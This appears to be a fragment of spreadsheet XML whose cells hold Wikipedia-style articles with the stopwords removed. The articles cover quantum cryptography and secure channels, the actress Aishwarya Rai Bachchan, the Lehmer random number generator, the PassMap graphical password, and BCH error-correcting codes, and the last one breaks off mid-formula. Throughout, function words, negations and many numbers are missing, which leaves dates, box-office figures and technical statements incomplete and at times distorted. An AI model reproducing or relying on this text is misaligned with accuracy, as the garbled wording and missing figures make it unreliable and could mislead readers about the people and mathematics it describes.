actual implementation technique exquisitely finicky expensive, limiting special purpose applications. also vulnerable attacks specific particular implementations imperfections optical components quantum cryptographic equipment built. while implementations classical cryptographic algorithms received worldwide scrutiny years, limited amount public research done assess security present-day implementations quantum cryptosystems, mostly widespread 2014. modeling secure channel security definitions secure channel model properties independently concrete instantiation. good understanding properties needed designing secure channel, able assess appropriateness employment cryptographic protocol. this topic provable security. definition secure channel remains secure, even used arbitrary cryptographic protocols important building block universally composable cryptography. universally composable authenticated channel built using digital signatures public infrastructure.universally composable confidential channels known exist computational hardness assumptions based hybrid encryption public infrastructure. also cryptochannel hybrid encryption secure communication references</t>
  </si>
  <si>
    <t>Aishwarya Rai Bachchan</t>
  </si>
  <si>
    <t>aishwarya (born november 1973) indian actress winner miss world 1994 pageant. primarily known work hindi tamil films, established popular influential celebrities india. received numerous accolades, including filmfare awards, honoured padma shri government india 2009 ordre arts lettres government france 2012. often cited media "the beautiful woman world".while college, modelling jobs. following appearances several television commercials, entered miss india pageant, placed second. crowned miss world 1994, began receiving offers film. made acting debut mani ratnam's 1997 tamil film iruvar first hindi film release pyaar gaya year. first commercial success tamil romantic drama jeans (1998), expensive film made indian cinema time. achieved wider success filmfare awards best actress performances chuke sanam (1999) devdas (2002). garnered critical appreciation portraying passionate artist tamil romance film kandukondain kandukondain (2000), tagore's heroine, binodini, bengali film chokher bali (2003), depressed woman drama raincoat (2004), kiranjit ahluwalia british drama film provoked (2006), nurse drama guzaarish (2010). rai's greatest commercial successes romance mohabbatein (2000), adventure film dhoom (2006), drama guru (2007), period film jodhaa akbar (2008), science fiction film enthiran (2010), romantic drama mushkil (2016). married actor abhishek bachchan 2007; couple daughter. off-screen roles include duties brand ambassador several charity organisations campaigns. goodwill ambassador joint united nations programme aids (unaids). 2003, first indian actress jury member cannes film festival. early life born november 1973 tulu-speaking bunt family mangalore, karnataka. father, krishnaraj, died march 2017, army biologist, mother, vrinda, housewife. elder brother, aditya rai, engineer merchant navy. rai's movie rishta (2003) co-produced brother co-written mother. family moved mumbai, attended arya vidya mandir high school. intermediate schooling hind college year, joined ruparel college matunga, securing percent exams.she trained classical dance music five years teens. favourite subject zoology, initially considered career medicine. then, plans become architect, enrolled rachana sansad academy architecture, later gave education pursue career modelling. career modelling work acting breakthrough (1991–2001) 1991, international supermodel contest (organised ford) eventually featured american edition vogue. 1993, gained huge public recognition appearance pepsi commercial actors aamir khan mahima chaudhry. single line "hi, sanjana," dialogue commercial made instantly famous. 1994 miss india pageant, second place, behind sushmita sen, crowned miss india world, also winning five sub-titles, "miss catwalk", "miss miraculous", "miss photogenic", "miss perfect ten" "miss popular". with representing india miss universe pageant, rai's duties first runner-up included representing india rival miss world pageant, held year city, south africa. went crown also "miss photogenic" award miss world continental queen beauty asia oceania. after winning pageant, spoke dream peace world, desire ambassador peace one-year reign london. continued pursue career model became actress.rai made acting debut 1997 mani ratnam's tamil film iruvar, semi-biographical political drama, featuring mohanlal, prakash raj, tabu revathi. film critical success among awards, best film award belgrade international film festival. featured pushpavalli kalpana dual roles; latter fictionalised portrayal politician former actress jayalalithaa. dialogue film dubbed tamil actress rohini. that year, cast ashi, naive teenager first bollywood film pyaar gaya, romantic comedy opposite bobby deol. both iruvar pyaar gaya commercial failures reviewers critical rai's acting ability films. however, latter, screen award best female debut.in 1998 big-budget tamil romantic drama jeans directed shankar, appeared alongside prashanth. played madhumita, young woman accompanies ailing grandmother united states seek medical attention. commercial success, film earned praise acting dancing skills. unlike iruvar, practised dubbed lines tamil film. jeans later submitted india's official entry academy awards 1998.rai's first role 1999 melodrama laut chalen, directed rishi kapoor. film critical failure average performance office. rai's portrayal pooja walia, traditional indian woman living united states, negative reviews; rediff.com published, "rai sports plastic smile never gets scene portray depth. smile look pretty". also 1999, starred romantic musical chuke sanam, became significant turning point career. film, adaptation maitreyi devi's bengali novel hanyate, directed sanjay leela bhansali co-starred salman khan ajay devgan. played nandini, gujarati woman forced wedlock (with devgan's character) despite love another (played khan). bhansali cast screening film impressed eyes. khalid mohamed bombay talkies wrote "reveals unquestionable felicity acting" "that impossible combination breathtaking beauty brains". chuke sanam emerged commercial success filmfare award best actress.rai next took leading role mansi, aspiring singer, subhash ghai's musical romantic drama taal; alongside akshay khanna anil kapoor. reviewer rediff praised acting dancing prowess film wrote "taal enhance reputation actress detracting image traffic-stopper". domestic commercial success, taal notable first indian film feature listing american office. received second best actress nomination year filmfare awards ceremony. 2000, starred kandukondain kandukondain, tamil language adaptation jane austen's novel sense sensibility. directed rajiv menon, film also starred mammooty, tabu ajith kumar prominent roles. cast meenakshi (based character marianne dashwood), younger sister tabu's character. film critical commercial success earned positive comments critics; review carried indian express summarized, "attacking role perfect dollop innocence, full justice part, matches perfectly tabu."rai next starred alongside shah rukh khan chandrachur singh action drama josh. portrayed shirley dias, twin sister khan's character falls love arch enemy's brother (played singh). casting khan's sister considered unusual pairing time; director mansoor khan, however, described "perfect". despite earning mixed reviews film critics, josh emerged commercial success. satish kaushik's social drama hamara aapke paas rai's next release; played rape victim film. co-starring anil kapoor sonali bendre, film well received critics well office. film critic sukanya verma praised rai's decision star film added "conveys turmoil pain rape victim well. transition emotional wreck trying gather broken pieces life back together amazing." rai's performance film eventually earned third best actress nomination filmfare.following leading role box-office flop dhai akshar prem took supporting role aditya chopra's musical romantic drama mohabbatein. played megha shankar, daughter amitabh bachchan's character commits suicide realizing father accept romance students (played shah rukh khan). receiving highly positive reviews critics, mohabbatein emerged highest-grossing film year earned nomination filmfare award best supporting actress. following year, starred alongside govinda jackie shroff romantic comedy albela. upon release, film performance received mostly negative reviews; taran adarsh bollywood hungama criticized film mentioned "plastic scenes".in 2001, appeared first world tour, craze 2001, series concerts performed across alongside anil kapoor, aamir khan, preity zinta gracy singh. show faced early cancellation september 2001 attacks, team prepared return india soon possible. however, shows continued successfully canada. devdas critical recognition (2002–2006) after featuring david dhawan's slapstick comedy film kisise nahin, appeared alongside shah rukh khan madhuri dixit sanjay leela bhansali's period romantic drama devdas, adaptation sharat chandra chattopadhyay's novel name. played role paro (parvati), love interest protagonist (played khan). film screened 2002 cannes film festival featured time listing best films millennium". devdas emerged major international success revenues ₹840 million (us$11 million). alan morrison, writing empire, praised performances three leads wrote, "rai proves acting talent back flawless looks". devdas chosen india's official entry academy award best foreign language film received nomination bafta awards best foreign language film category. india, film filmfare awards, including second best actress award rai. also 2002, participated show from india with love along amitabh bachchan, aamir khan, shah rukh khan preity zinta. took place outdoor venues, manchester's trafford london's hyde park, 100,000 spectators.in 2003, featured romantic dramas brother's production début rishta, alongside arjun rampal, rohan sippy's kuch kaho, alongside abhishek bachchan. neither films fared well critically commercially. later noted starring role rituparno ghosh's independent bengali film chokher bali, adaptation rabindranath tagore's novel name. portrayed character binodini, emotionally manipulative widow, struggling sexual desires early-20th century bengal. film major critical success earned positive notice performance; derek elley variety noted, "rai dominates film delicately sensual presence physical grace". commercially, film sleeper hit.after success chokher bali, returned mainstream hindi film rajkumar santoshi's khakee (2004), action thriller featuring amitabh bachchan, akshay kumar, ajay devgan tusshar kapoor. film tells story five constables embroiled mystery surrounding terrorist attack; rai's role mahalakshmi, moll. while filming khakee, accidentally running car, resulted fracture left foot. upon release, film moderate critical commercial success. next release, romantic comedy kyun! gaya na..., played diya malhotra, university student develops one-sided attraction toward friend arjun khanna (played vivek oberoi). film received mixed-to-positive reviews critics, commercially unsuccessful.rai garnered international recognition 2004 starring role opposite martin henderson gurinder chadha's british film bride prejudice, bollywood-style adaptation jane austen's novel pride prejudice. international film critics expressed mixed views rai's performance punjabi version elizabeth bennet; review carried york times mentioned "radiantly beautiful inert", rolling stone noted "she world-class hottie talent match, proves first english-speaking role." with worldwide gross million production budget million, bride prejudice proved commercial success. next collaborated director rituparno ghosh second time 2004 relationship drama raincoat, adaptation henry's gift magi, national film award best feature film hindi. critics praised film also noted lack glamour rai's role, earned best actress nomination filmfare. derek elley variety called film "chamber-sized gem" mentioned "[s]hunning usual immaculate makeup duds, looking like broken, malfunctioning doll." contrary, gautaman bhaskaran hindu thought "looks quite plain [and] seems made earnest effort emote, using less body limbs face, eyes particular." next co-starred alongside sanjay dutt zayed khan 2005 adult drama shabd, tells story author convinces wife pursue illicit relationship younger research next book. film received predominantly negative reviews proved commercial failure. times india concluded, "for umpteenth time, looks drop-dead gorgeous. that's like picture postcard actually waiting letter. it's beautiful look says nothing." year, took lead role tilo paul mayeda berges's romantic fantasy film mistress spices, adaptation novel name chitra banerjee divakaruni. film received negative reviews film critics emerged commercial failure. peter bradshaw guardian termed rai's performance "annoying" wrote "wafts simpers" entire film. rai's successful venture 2005 special appearance shaad ali's comedy bunty babli, featured widely popular item number kajra alongside film's male leads, future husband abhishek bachchan future father-in-law amitabh bachchan.rai film releases 2006, dutta's umrao jaan yash films' dhoom former, adaptation mirza hadi ruswa's urdu novel umrao jaan (1905), tells story doomed courtesan 19th-century lucknow. played titular role, character famously played rekha first film adaptation novel. reviewers, comparing film previous adaptation, critical film well rai's performance. noted, "while aishwarya could emulate grace poise rekha, quite capture intensity umrao's abiding melancholy", adding "rai's incandescent beauty artistry [..] indeed keep audience watching, though necessarily emotionally engaged."in sanjay gadhvi-directed adventure film dhoom portrayed sunehri, petty thief helps police catch illusive criminal; film ensemble cast including hrithik roshan, abhishek bachchan, bipasha basu, uday chopra. despite receiving mixed reviews critics, dhoom rai's first major commercial success since devdas; film declared blockbuster, became highest grossing indian film 2006 gross revenues ₹1.11 billion (us$14 million). rediff.com commented, "[she] gloss depth. seldom feel tension behaviour expressions. [..] sunehri enters film nearly minutes opening disguise. time, wearing flimsiest clothes. once opens mouth—and minutes appearing film—she spoils image." nonetheless, performance earned sixth filmfare award nomination best actress category. career fluctuations sabbatical (2007–2010) 2007, played wife abhishek bachchan's character mani ratnam's social drama guru. fictionalised biography businessman dhirubhai ambani, guru tells riches story uneducated builds multinational corporation. film international critical acclaim emerged box-office success. richard corliss time labelled character "ornament", raja rediff described "arguably finest performance, visible especially takes film's climax." received seventh best actress nomination filmfare performance film. next starred alongside naveen andrews miranda richardson mundhra's independent british drama provoked, real-life character kiranjit ahluwalia, non-resident indian murders husband suffering years domestic abuse. earned mostly positive comments performance. critic indu mirani wrote, "aishwarya plays battered wife undoubtedly best performances date. convincingly goes various stages shock, bewilderment, remorse finally vindication". internationally well-received, film emerged moderate commercial success united kingdom. that year, starred alongside kingsley, colin firth thomas sangster indian warrior mira doug lefler's epic film last legion.between july august 2008, rai, husband abhishek bachchan, father-in-law amitabh bachchan, actors preity zinta, ritesh deshmukh madhuri dixit starred "unforgettable world tour" stage production. first covered canada, trinidad, london, england. also involved functional administrative operations father-in-law's company, originally known abcl, rechristened corp. ltd. that company, along wizcraft international entertainment pvt. ltd., developed unforgettable production.after series films under-performed either critically commercially, garnered critical box-office success ashutosh gowariker's period romantic drama jodhaa akbar (2008). film narrates partly fictionalised account marriage convenience mughal emperor jalaluddin muhammad akbar (played hrithik roshan) rajput princess jodha (played rai). rajeev masand noted, "rai wonderfully restrained uses eyes expertly communicate much, making finest outings screen." film gross earnings ₹1.12 billion (us$14 million) fetched best actress nomination filmfare awards ceremony. co-starred husband, abhishek bachchan, father-in-law, amitabh bachchan, gopal verma's political drama sarkar raj, sequel 2005 box-office sarkar. cast anita rajan, international power firm proposes plant rural maharashtra. film critical commercial success, praise directed performances three leads. rai's next role 2009 harald zwart-directed comedy pink panther starring alongside steve martin, jean reno emily mortimer, portrayed role sonia solandres, seductive criminology expert. like predecessor, sequel received negative reviews critics, moderate business million american office. roger ebert wrote, "rai breathtaking bollywood films, devote great deal expertise admiring beauty, underutilized much background"; today mentioned expressions "wooden" added, "she looks gorgeous, expression rarely changes". 2010, cast mani ratnam tamil film, also bilingual modern-day adaptation indian epic ramayana. role ragini (modeled sita, heroine ramayana), woman married superintendent police, kidnapped bandit. tamil version (raavanan) hindi version (raavan) film shot simultaneously played role film versions. dubbed dialogues tamil film raavanan like earlier tamil films, jeans kandukondain kandukondain. made comeback tamil cinema years. tamil version raavanan huge commercial success, whereas hindi version raavan commercial failure. films received polarizing reviews film critics, rai's performance. kaveree bamzai india today wrote, "rai's sita best things film performance heartfelt—this performer ease playing women, rather girls." however, film critics aniruddha guha rajeev masand criticized character noted, "she's left scream shriek hiss." commercially, raavanan emerged success raavan flopped. rai's next role opposite rajinikanth science fiction tamil film enthiran (2010), directed shankar. cast sana, college student girlfriend rajinikanth's character. time release, enthiran expensive indian film production eventually emerged highest-grossing indian films time. appeared mala, impetuous brat, vipul shah's action replayy; science fiction comedy co-starring akshay kumar, aditya kapoor neha dhupia. rai's final film 2010 drama guzaarish; third collaboration director sanjay leela bhansali actor hrithik roshan. film tells story ethan mascarenas, former magician (played roshan) quadriplegia, years struggle, files appeal euthanasia. rai's role sophia d'souza, mascarenas' nurse, abused alcoholic husband. bhansali's prior associations, agreed project reading script. despite flopping office, guzaarish positive critical reviews. telegraph described "one rai's best performances" times india summarised, "rai stunning picture fire grace, walking away certain scenes sheer vitality." 2011, cast protagonist madhur bhandarkar's social drama heroine; however, pregnancy, replaced actress kareena kapoor, original choice role. intermittent work (2015–present) after five-year sabbatical film acting, made comeback sanjay gupta's drama-thriller jazbaa, co-starring shabana azmi irrfan khan. remake korean thriller seven days (2007), film play role anuradha verma, criminal lawyer forced defend rapist exchange daughter's safety. shubha shetty-saha mid-day criticised film's unnecessary intrusive melodrama thought "looks part even fairly decent job, barring certain emotional scenes clearly goes top". film underperformed office. 2016, starred omung kumar's biographical drama sarbjit. film based life indian farmer sarabjit singh, convicted terrorism pakistani court, sister dalbir kaur fought relentlessly release. played role sister sarabjit singh (played randeep hooda). film premiered 69th cannes film festival, received mixed reactions critics. reviewers expressed "miscast" neither looked sounded like sikh woman. punjabi accent over-the-top performance scenes largely criticized, though several critics took note much stood film's quieter scenes. rajeev masand summarised "she's required scream shout weep copiously express anguish; shrillness favors. quieter moments like dalbir can't bear part stillborn baby actress shines." nonetheless, role earned tenth filmfare award best actress nomination. film earned ₹440 million (us$5.5 million) worldwide production budget ₹150 million (us$1.9 million).rai's final release 2016 karan johar's musical romantic drama mushkil, alongside anushka sharma, ranbir kapoor fawad khan played role poet named saba. received positive reviews performance, despite limited screen time. leydon variety considered film's prime asset wrote "seems wandered another movie, emotions conveyed subtler affecting fashion. when takes leave mushkil, wish could her." film emerged biggest commercial successes revenues billion (us$25 million). years later, played part singer kidnapped troubled father unremarkable comedy-drama fanney khan (2018). adaptation belgian film everybody's famous! (2000), film co-starred anil kapoor rajkummar rao. uday bhatia mint disliked film found "too unruffled screen presence convincingly sell kind silliness film requires".rai next star ratnam's tamil period film ponniyin selvan. personal life 1999, began dating bollywood actor salman khan; relationship often reported media couple separated 2002. cited "abuse (verbal, physical emotional), infidelity indignity" part khan reasons ending relationship. romantic relationship actor vivek oberoi broke-up 2005. though appeared dhai akshar prem longtime boyfriend, salman khan, brief cameo) kuch kaho, abhishek bachchan fell love whilst filming dhoom their engagement announced january 2007 later confirmed father, amitabh bachchan. couple married april 2007 according traditional hindu rites bunt community, belongs. north indian bengali ceremonies also performed. wedding took place private ceremony bachchan residence, "prateeksha", juhu, mumbai. they described indian media supercouple. close family, lived bandra, mumbai, marriage.rai hindu deeply religious. international presence shot abhishek bachchan accompanied cannes film festival shortly marriage, later oprah winfrey show, appearing september 2009. they described famous couple brangelina.rai gave birth girl, aaradhya, november 2011. commonly referred fans media nicknames "ash" "aish", stated dislikes called such. discouraged people referring names "aishwarya" want "spoil [her] good name".on july 2020, daughter reported tested positive covid-19. july, reported hospitalized. daughter recovered discharged hospital july 2020. public image activism impact media reception bachchan popular bollywood celebrities. despite constant media speculation, keeps personal life well-guarded. physical appearance performances made style icon young women. 2011, india today noted 17,000 websites dedicated her. selected verve magazine list country's powerful women. 2001, forbes named among five indian movie stars. reader poll conducted uk's hello! magazine, voted "the attractive woman 2003". year, appeared rolling stone magazine's annual "hot list". 2004, chosen time world's influential people, appeared cover 2003 asia edition.rai first indian actress jury cannes international film festival. october 2004 figure display london's madame tussaud's museum. sixth indian second bollywood personality—after father-in-law, amitabh bachchan—to honour. 2007, figure displayed madame tussaud's museum times square york. distinctive physical features, rai's green-blue eyes, luscious lips, curves feminine mannerisms cited media trademark.in 2005, subject minutes profile january, said least according thousands sites, internet polls even julia roberts", "the world's beautiful woman". year, tulip netherlands named "aishwarya rai" her. also 2005, mattel released limited edition barbie dolls united kingdom. british magazine maxim ranked first list "hottest women india". appeared shows late show david letterman, first bollywood personality appear oprah's "women across globe" segment. 2005 harpers queen's list "most beautiful women world" ranked ninth. 2006, featured people magazine "world's most beautiful people". magazine eastern ranked third list "asia's sexiest women" 2006, ranked eighth 2009. 2008, american television channel entertainment listed rai's eyes sexiest sexiest body parts list. 2009, made appearances martha stewart's show martha tyra banks show. year forbes listed 387th 1,411 actors list bankable stars hollywood. highest-ranked indian actor list.in poll conducted newspaper daily news analysis 2009, voted india's popular icons. attended 83rd academy awards, along husband, abhishek. husband abhishek bachchan appeared oprah winfrey show september 2009. first indian celebrity appeared oprah winfrey show twice. they described supercouple indian media.she ranked times india's desirable women 2010, ranked 2011. 2011, received negative publicity failing lose post-pregnancy weight apparently "required" public figure. however, silenced critics walking carpet "amfar cinema against aids" gala 2012 cannes film festival 11th time. later year, made issue york magazine's list "forty women that women find beautiful", grabbed 21st position list, york magazine saying "she "world's beautiful woman," really love never feels fragile onscreen". market research firm yougov named world's eleventh admired person 2018. endorsements made first commercial camlin exam pencils grade. became popular appearing pepsi commercial actor aamir khan. actress endorsed pepsi coca-cola. brand ambassadors country paid bollywood actresses respect. modelled titan watches, longines watches, l'oréal, coca-cola, lakmé cosmetics, casio pager, philips, palmolive, lux, fuji films, nakshatra diamond jewellery, kalyan jewellers. named official brand ambassador beers diamonds india. ranked popular watch brand ambassador worldwide survey, conducted world watch report. 2013 husband abhishek bachchan roped brand ambassadors group. social humanitarian work 1999 participated world tour called magnificent five, along aamir khan, rani mukerji, akshaye khanna twinkle khanna. year, appointed longines ambassador elegance. 2003, became first indian actress jury member cannes film festival. year became global brand ambassador l'oréal, alongside andie macdowell, longoria penélope cruz. brand ambassador bank association india's nationwide campaign promote donation india. 2005, became brand ambassador pulse polio, campaign established government india 1994 eradicate polio india. year, appointed spokesperson international year microcredit, raising awareness main goals priorities united nations' poverty alleviation efforts.in february 2005 performed bollywood stars help! telethon concert, event raise money victims 2004 tsunami earthquake. along members bachchan family, laid foundation special school underprivileged girls daulatpur village uttar pradesh 2008. construction funded bachchan family school named rai. appeared along various bollywood actors closing ceremony 2006 commonwealth games melbourne. performance showcased indian culture lead-up india hosting 2010 commonwealth games.rai microcredit spokesperson. supports peta india. pledged donate eyes bank association india appeared public awareness film donation. november 2004, created aishwarya foundation help needy people india. 2009 appointed first goodwill ambassador smile train, international charity provides free cleft palate surgery children need. work smile train focus india, different developing countries around world. september 2012, joined united nations secretary general ki-moon renowned hollywood actor michael douglas ceremony commemorate international peace york. later week, appointed international goodwill ambassador unaids, joint united nations programme aids hiv. raise global awareness protecting children infection increasing access antiretroviral treatment. works accolades filmography appeared films five languages, predominantly hindi tamil. awards nominations received several accolades, include filmfare awards roles chuke sanam (1999) devdas (2002). also list bollywood actresses list indian film actresses references further reading external links aishwarya bachchan imdb aishwarya bachchan bollywood hungama aishwarya bachchan instagram</t>
  </si>
  <si>
    <t>Lehmer random number generator</t>
  </si>
  <si>
    <t>lehmer random number generator (named lehmer), sometimes also referred park–miller random number generator (after stephen park keith miller), type linear congruential generator (lcg) operates multiplicative group integers modulo general formula {\displaystyle x_{k+1}=a\cdot x_{k}{\bmod {m}},} modulus prime number power prime number, multiplier element high multiplicative order modulo (e.g., primitive root modulo seed coprime other names multiplicative linear congruential generator (mlcg) multiplicative congruential generator (mcg). parameters common 1988, park miller suggested lehmer particular parameters 2,147,483,647 mersenne prime m31) 16,807 primitive root modulo m31), known minstd. although minstd later criticized marsaglia sullivan (1993), still today particular, carbonlib c++11's minstd_rand0). park, miller stockmeyer responded criticism (1993), saying: given dynamic nature area, difficult nonspecialists make decisions generator use. "give something understand, implement port... state-of-the-art, make sure reasonably good efficient." article associated minimal standard generator attempt respond request. five years later, need alter response suggest multiplier 48271 place 16807. this revised constant used c++11's minstd_rand random number generator. sinclair zx81 successors lehmer parameters 65,537 fermat prime primitive root modulo f4). cray random number generator ranf lehmer power-of-two modulus 44,485,709,377,909. scientific library includes several random number generators lehmer form, including minstd, ranf, infamous random number generator randu. choice modulus most commonly, modulus chosen prime number, making choice coprime seed trivial (any do). this produces best-quality output, introduces implementation complexity, range output unlikely match desired application; converting desired range requires additional multiplication. using modulus power makes particularly convenient computer implementation, comes cost: period m/4, lower bits periods shorter that. this lowest bits form modulo-2k generator themselves; higher-order bits never affect lower-order bits. values always (bit never changes), bits alternate (the lower bits repeat period lower bits repeat period therefore, application using random numbers must significant bits; reducing smaller range using modulo operation even modulus produce disastrous results.to achieve period, multiplier must satisfy (mod seed must odd. using composite modulus possible, generator must seeded value coprime period greatly reduced. example, modulus might seem attractive, outputs easily mapped 32-bit word 232. however, seed 6700417 (which divides multiple would lead output period 640. popular implementation large periods combined linear congruential generator; combining (e.g. summing outputs) several generators equivalent output single generator whose modulus product component generators' moduli. whose period least common multiple component periods. although periods share common divisor moduli chosen common divisor resultant period 1)(m2 1)···(mk 1)/2k−1.: example wichmann–hill generator. relation while lehmer viewed particular case linear congruential generator c=0, special case implies certain restrictions properties. particular, lehmer rng, initial seed must coprime modulus required lcgs general. choice modulus multiplier also restrictive lehmer rng. contrast lcg, maximum period lehmer equals prime primitive root modulo hand, discrete logarithms base primitive root modulo {\displaystyle \mathbb _{m}} represent linear congruential sequence modulo euler totient {\displaystyle \varphi (m)} implementation prime modulus requires computation double-width product explicit reduction step. modulus less power used (the mersenne primes popular, 59), reduction modulo implemented cheaply general double-width division using identity (mod basic reduction step divides product e-bit parts, multiplies high part adds them: ⌊ax/2e⌋. this followed subtracting result range. number subtractions limited ad/m, easily limited small chosen. (this condition also ensures ⌊ax/2e⌋ single-width product; violated, double-width product must computed.) when modulus mersenne prime procedure particularly simple. multiplication trivial, conditional subtraction replaced unconditional shift addition. this, note algorithm guarantees (mod meaning impossible. this avoids need consider equivalent e-bit representations state; values high bits non-zero need reduction. bits product cannot represent value larger high bits never hold value greater thus first reduction step produces value 2e+1 this 1)-bit number, greater (i.e. might set), high half bits strictly less thus whether high second reduction step (addition halves) never overflow bits, desired value. conditional subtraction also avoided, procedure intricate. fundamental challenge modulus like lies ensuring produce representation values solution temporarily range possible values reduce values larger bits never generates representations less finally subtracting temporary offset produces desired value. begin assuming partially reduced value bounded 2e+1 case, single offset subtraction step produce d)/2e⌋ this, consider cases: case, desired. case, 2e+1 1)-bit number, d)/2e⌋ thus, desired. because multiplied high part least subtracting offset never causes underflow.(for case lehmer generator specifically, zero state image never occur, offset work same, convenient. this reduces offset mersenne prime case, reducing larger product less 2e+1 done reduction steps without offset. additional reduction step suffices. since 1)2e, reduction step converts this within limit initial assumption. possible first reduction step produce greater 2e+1 large final reduction step. also requires multiplication produce product larger bits, mentioned above.) however, long first reduction produce value range required preceding case reduction steps apply. schrage's method double-width product available, schrage's method, also called approximate factoriation method, used compute comes cost: modulus must representable signed integer; arithmetic operations must allow range choice multiplier restricted. require ⌊m/a⌋, commonly achieved choosing division (with remainder) iteration required.while technique popular portable implementations high-level languages lack double-width operations,: modern computers division constant usually implemented using double-width multiplication, technique avoided efficiency concern. even high-level languages, multiplier limited double-width product computed using single-width multiplications, reduced using techniques described above. schrage's method, first factor i.e. precompute auxiliary constants ⌊m/a⌋ (m−r)/a. then, iteration, compute ⌊x/q⌋ (mod this equality holds {\displaystyle {\begin{aligned}aq&amp;=a\cdot (m-r)/a\\&amp;=(a/a)\cdot (m-r)\\&amp;=(m-r)\\&amp;\equiv -r{\pmod {m}}\\\end{aligned}}} factor q⌊x/q⌋, get: {\displaystyle {\begin{aligned}ax&amp;=a(x{\bmod {q}})+aq\lfloor x/q\rfloor \\&amp;=a(x{\bmod {q}})+(m-r)\lfloor x/q\rfloor \\&amp;\equiv a(x{\bmod {q}})-r\lfloor x/q\rfloor {\pmod {m}}\\\end{aligned}}} reason overflow terms less since m/a, first term strictly less am/a computed single-width product. chosen (and thus second term also less ⌊x/q⌋ rx/q x(r/q) x(1) thus, difference lies range [1−m, m−1] reduced m−1] single conditional add.this technique extended allow negative changing final reduction conditional subtract. technique also extended allow larger applying recursively.: terms subtracted produce final result, second ⌊x/q⌋) risks overflow. modular multiplication compile-time constant implemented technique. because step, average, halves size multiplier average value (a−1)/2), would appear require step spectacularly inefficient. however, step also divides ever-increasing quotient ⌊m/a⌋, quickly point reached argument recursion terminated. sample code using code, park-miller written follows: this function called repeatedly generate pseudorandom numbers, long caller careful initialize state number greater zero less modulus. implementation, 64-bit arithmetic required; otherwise, product 32-bit integers overflow. avoid 64-bit division, reduction hand: 32-bit arithmetic, schrage's method: 16×16-bit multiplies: another popular lehmer generator uses prime modulus 232−5: this also written without 64-bit division: many lehmer generators good properties. following modulo-2128 lehmer generator requires 128-bit support compiler uses multiplier computed l'ecuyer. period 2126: generator computes 128-bit value returns upper bits. this generator passes bigcrush testu01, fails tmfn test practrand. that test designed catch exactly defect type generator: since modulus power period lowest output 262, rather 2126. linear congruential generators power-of-2 modulus similar behavior. following core routine improves upon speed code integer workloads constant declaration allowed optimized calculation loop compiler): however, multiplication deferred, suitable hashing, since first call simply returns upper bits seed state. references lehmer, (1949). "mathematical methods large-scale computing units". proceedings second symposium large-scale digital calculating machinery. 141–146. 0044899. (journal version: annals computation laboratory harvard university, vol. (1951)). steve park, random number generators external links primes less power useful choosing moduli. part prime pages.</t>
  </si>
  <si>
    <t>PassMap</t>
  </si>
  <si>
    <t>passmap map-based graphical password method authentication, similar passwords, proposed national tsing university researchers. word passmap originates word password substituting word map. history usage passmap proposed national tsing university researchers hung-min sun, yao-hsin chen, chiung-cheng fang, shih-ying chang association computing machinery symposium information, computer communications security. they defined passmap letting consumer authenticated choosing series points world map. their study showed people passmap passwords user friendly memorable.users shown google maps screen zoom choose points want become passmap password. since passmap uses google maps, cannot used applications lack internet access google maps integration. default, passmap's screen eighth zoom level centered taiwan. passmap constraints zoom level, consumers allowed select dots unsafer, lower levels like level normalize error tolerance based screen's zoom position. passmap's effective login percentage 92.59%. commentary ritika sachdev wrote international journal pure applied research engineering technology based psychological studies, people effortlessly recall milestones visited. sachdev called passmap "highly subjective customized based password ensure security".s. rajarajan, prabhu, palanivel praised passmap "good memorability usage password mechanism". noted like many graphical passwords, passmap susceptible shoulder surfing intrusion. references</t>
  </si>
  <si>
    <t>BCH code</t>
  </si>
  <si>
    <t>coding theory, bose–chaudhuri–hocquenghem codes (bch codes) form class cyclic error-correcting codes constructed using polynomials finite field (also called galois field). codes invented 1959 french mathematician alexis hocquenghem, independently 1960 chandra bose d.k. ray-chaudhuri. name bose–chaudhuri–hocquenghem (and acronym bch) arises initials inventors' surnames (mistakenly, case ray-chaudhuri). features codes code design, precise control number symbol errors correctable code. particular, possible design binary codes correct multiple errors. another advantage codes ease decoded, namely, algebraic method known syndrome decoding. this simplifies design decoder codes, using small low-power electronic hardware. codes used applications satellite communications, compact disc players, dvds, disk drives, flash drives, solid-state drives, quantum-resistant cryptography two-dimensional codes. definition illustration primitive narrow-sense codes given prime number prime power positive integers primitive narrow-sense code finite field galois field) gf(q) code length distance least constructed following method. primitive element gf(qm). positive integer mi(x) minimal polynomial coefficients gf(q) generator polynomial code defined least common multiple g(x) lcm(m1(x),…,md 1(x)). seen g(x) polynomial coefficients gf(q) divides therefore, polynomial code defined g(x) cyclic code. example (therefore 15). consider different values gf(16) gf(24) based reducing polynomial using primitive element α(z) there fourteen minimum polynomials mi(x) coefficients gf(2) satisfying {\displaystyle m_{i}\left(\alpha ^{i}\right){\bmod {\left(z^{4}+z+1\right)}}=0.} minimal polynomials {\displaystyle {\begin{aligned}m_{1}(x)&amp;=m_{2}(x)=m_{4}(x)=m_{8}(x)=x^{4}+x+1,\\m_{3}(x)&amp;=m_{6}(x)=m_{9}(x)=m_{12}(x)=x^{4}+x^{3}+x^{2}+x+1,\\m_{5}(x)&amp;=m_{10}(x)=x^{2}+x+1,\\m_{7}(x)&amp;=m_{11}(x)=m_{13}(x)=m_{14}(x)=x^{4}+x^{3}+1.\end{aligned}}} code {\displaystyle d=2,3} generator polynomial {\displaystyle g(x)={\rm {lcm}}(m_{1}(x),m_{2}(x))=m_{1}(x)=x^{4}+x+1.\,} minimal hamming distance least corrects error. since generator polynomial degree code data bits checksum bits. code {\displaystyle d=4,5} generator polynomial {\displaystyle {\begin{aligned}g(x)&amp;={\rm {lcm}}(m_{1}(x),m_{2}(x),m_{3}(x),m_{4}(x))=m_{1}(x)m_{3}(x)\\&amp;=\left(x^{4}+x+1\right)\left(x^{4}+x^{3}+x^{2}+x+1\right)=x^{8}+x^{7}+x^{6}+x^{4}+1.\end{aligned}}} minimal hamming distance least corrects errors. since generator polynomial degree code data bits checksum bits. code {\displaystyle d=6,7} generator polynomial {\displaystyle {\begin{aligned}g(x)&amp;={\rm {lcm}}(m_{1}(x),m_{2}(x),m_{3}(x),m_{4}(x),m_{5}(x),m_{6}(x))=m_{1}(x)m_{3}(x)m_{5}(x)\\&amp;=\left(x^{4}+x+1\right)\left(x^{4}+x^{3}+x^{2}+x+1\right)\left(x^{2}+x+1\right)=x^{10}+x^{8}+x^{5}+x^{4}+x^{2}+x+1.\end{aligned}}} minimal hamming distance least corrects three errors. since generator polynomial degree code data bits checksum bits. (this particular generator polynomial real-world application, format patterns code.) code {\displaystyle d=8} higher generator polynomial {\displaystyle {\begin{aligned}g(x)&amp;={\rm 